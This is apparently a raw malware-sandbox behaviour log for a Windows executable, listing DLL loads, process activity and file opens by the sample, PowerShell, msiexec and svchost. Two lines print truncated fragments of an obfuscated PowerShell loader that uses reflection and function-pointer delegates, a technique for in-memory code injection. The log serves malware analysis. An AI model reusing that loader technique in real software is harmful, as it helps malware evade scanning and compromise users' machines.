Source: C:\Users\user\Desktop\4PYRGCo1Di.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\4PYRGCo1Di.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\4PYRGCo1Di.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\4PYRGCo1Di.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\4PYRGCo1Di.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\4PYRGCo1Di.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\4PYRGCo1Di.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\4PYRGCo1Di.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((talesignals $Halflife $Perfectivity), (Nonconceptually @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Beviserne = [AppDomain]::CurrentDomain.GetAssemblies
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Overfladearealer)), $Eyeliner).DefineDynamicModule($Tilflytningskommunen, $false).DefineType($Predazzite, $Projecture, [System.Multica

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 3_2_0601A8FA push es; ret	3_2_0601A900
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 3_2_0601F381 push 14418B04h; ret	3_2_0601F393
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 3_2_22303427 pushfd ; retf	3_2_22303428

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\4PYRGCo1Di.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
